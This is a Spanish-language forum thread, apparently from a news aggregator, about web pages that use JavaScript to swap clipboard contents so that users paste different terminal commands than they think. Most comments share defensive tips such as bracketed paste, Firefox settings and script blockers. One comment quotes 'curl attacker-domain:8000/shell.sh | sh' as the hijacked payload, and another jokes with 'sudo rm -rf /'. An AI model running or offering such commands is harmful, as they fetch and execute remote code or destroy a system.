Programadores, administradores de sistemas, investigadores de seguridad y aficionados a la tecnología que copian y pegan comandos desde páginas web en una consola o terminal corren el riesgo de que su sistema se vea comprometido. Un analista muestra un simple truco que le hará pensar dos veces antes de copiar y pegar texto desde páginas web.
|
etiquetas: ciberseguridad , programación , software
No soy informático, como muchos por aquí.
Quizas el peligro sería copiar un comando de instalación una aplicación con un comando que apunte a una versión “alternativa” de ella, así que hay que vigilar de donde obtienes esas instrucciones.
Y aquí he dejado de leer. No porque no esté de acuerdo con el artículo, sino porque no soy ninguna de esas cosas. Si copio algo en internet es o bien texto, o bien una dirección de página web.
Por eso se suele recomendar pegarlo en un bloc de notas antes
Saludos
El ataque es que mediante javascript en la pagina tu crees que estas copiando un texto como 'sudo apt upgrade' cuando en realidad estas copiando 'curl attacker-domain:8000/shell.sh | sh'
Curaos en salud y pegad siempre antes en vuestro editor de texto favorito (vim) y revisad.
Fan es poco.
$sudo rm -rf /
...y adiós problema
En cualquier caso, la verdad es que es algo que nunca he tenido en cuenta, y lo pasaré por un editor de texto antes cuando la fuente no es conocida.
En este caso hay dos variantes distintas... No saber lo que estás pegando pero que sea lo mismo que estás copiando. Y saber lo que estás copiando pero que no sea lo mismo que estás pegando
Saludos
(por no hablar de que luego el codigo se prueba en DES y QAS antes y ya verias algo rarete, porque si, me averguenza admitirlo pero yo soy de esas nenazas que tiene entornos estanco de pruebas y desarrollo... es triste admitirlo pero me gano la vida así a base de vender mi dignidad con maquinas de pruebas que garantizen la seguridad)
Gracias
Sobre lo de copiar de fuentes fiables que comenta #3, cualquier sitio puede haber sido crackeado y aunque suela ser un sitio de confianza puede que un día en concreto no lo sea.
La altenartiva de pegar en un editor de texto es la mejor opción, pero, siendo sinceros, nadie la hace ni la va a hacer salvo que estos ataques se vuelvan demasiado frecuentes.
Por otro lado, me parece de risa que una web puede alterar tu portapapeles sin tu consentimiento.
RIP Chromium users.
Yo es que para trabajar estoy obligado a utilizar Windows, así que utilizo Mobaxterm y desde ahí conecto a las máquinas de Linux.
cc #21
Jajaja ya, cuéntame otra.
-Tu trabajo es copiar y pegar? Sip
-Tu trabajo consiste en copiar y pegar? Nop, tambien tengo que entender que copio, que pego y como lo adapto.
Cuando no falla el arranque claro.
<sys/errno.h>: Editor too big!
Lo peor de todo es que probablemente también uses Ublock Origin. Con esa extensión no hacen falta los deshabilitadores de JS.
Saludos
Puta locura oye lo de seguir el manual
CC #29
La funcion de copiar en el portapapeles es gracias al JS.
Está claro que todo lo que hagas en Internet tiene cierto riesgo. Todo. Por un lado u otro te pueden joder, o hackear un sitio, o una fuente de datos o el camino hacia ellos... Pero la probabilidad de que pase, de que te pille en medio y, además, el daño que te haga sea grande pues es menor. Si usas GoogleApis pues es menor que si usas fulanitoApis.
(Desde luego que las precauciones en general hay que tenerlas. Porque nadie pensaba que iba a arder el puto OVH entero y ahí está, chamuscao)
No siempre me dejan elegir S.O.
Anda que no habré metido veces la pata al meter código de portapapeles que contenía otra cosa distinta a lo que creía (por haber seleccionado un texto sin darme cuenta)
www.securityweek.com/trojan-source-attack-abuses-unicode-inject-vulner
Ahora fiate de servidores git públicos....
Revisando el tutorial, veo que la línea en concreto es esta:
dom.event.clipboardevents.enabled = false
Hay que cambiarla en about:config.
Por si a alguien le interesa:
restoreprivacy.com/firefox-privacy/
Es muy incómodo al principio, pero se puede vivir con ello y te aporta mucha más privacidad y seguridad que la configuración por defecto.
Lo único que te protegerá son extensiones bloqueadoras con listas blancas, como NoScript o uMatrix... la pega es que rompen webs con gran facilidad (especialmente uMatrix sigue rompiendo ciertas webs incluso tras darles permisos totales)
Lo ideal sería que los navegadores y empresas estandarizadoras se pusieren a crear un sistema de permisos para JS, para impedir usos abusivos o maliciosos (el acceso al historial y portapapeles) salvo en escenarios seguros o previa autorizacion del usuario.
E incluso, pegarlo en tu editor de texto antes de cualquier cosas.
E incluso mejor, entender que estas leyendo y escribirlo tu a manita.
Y te imagino buscando a ver si por un casual alguno de ellos pudiera constituir un comando que se pudiera haber ejecutado (obviamente uno de apache no debería dar problema)
Ayer mismo entre "cp" por aquí "rm" por allá me cepillé un fichero que no debía. Menos mal que era una tontería prescindible.
Lo de pedir confirmación al pegar varias líneas en la consola parece que sería una característica útil
Repito, no uséis el copiar y pegar.
Lo digo de nuevo, no uséis el copiar y pegar.
No uséis el copiar y pegar.
Edito: por lo menos en manjaro.
cirw.in/blog/bracketed-paste
unix.stackexchange.com/a/600641
Establecer en
~/.inputrc
set enable-bracketed-paste on
No lo conocía, y no está mal ... Al menos te da tiempo a rectificar
security.stackexchange.com/questions/39118/how-can-i-protect-myself-fr y hay protección
Y si en alguna ocasión un trozo de código hace su magia y no consigo entender porqué.....pues igualmente lo dejo (pasa pocas veces! )
Me apoyo en un TXT donde primero copio los comandos y luego los ejecuto en el equipo así que sería raro que me la pegasen, también hay que entender lo que se está haciendo, claro.
Pero, aunque ya lo había leido antes, me ha venido bien para reafirmarme en esta práctica de pasar antes por un TXT y luego ejecutar.
Por cierto, no habla de copiar código, sino comandos, pero tú a lo tuyo.
Insisto, había dos opciones con tu comentario...